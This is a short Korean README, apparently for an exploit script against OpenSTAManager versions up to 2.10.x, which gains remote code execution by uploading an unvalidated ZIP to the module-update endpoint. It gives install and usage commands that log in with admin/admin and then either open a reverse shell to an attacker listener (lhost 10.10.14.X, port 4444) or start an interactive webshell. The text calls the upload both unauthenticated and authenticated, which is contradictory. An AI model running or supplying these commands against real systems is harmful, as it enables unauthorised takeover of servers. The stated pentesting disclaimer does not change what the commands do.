
인증되지 않은 ZIP 업로드를 통한 OpenSTAManager 원격 코드 실행 취약점을 악용하는 인증 기반 익스플로잇으로, 승인된 침투 테스트를 위한 리버스 셸 및 대화형 웹셸 기능을 제공합니다.
모듈 업데이트 엔드포인트에서 검증되지 않은 ZIP 업로드를 통한 인증된 RCE.
영향받는 버전: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
공인된 침투 테스트 및 교육 목적으로만 사용하십시오.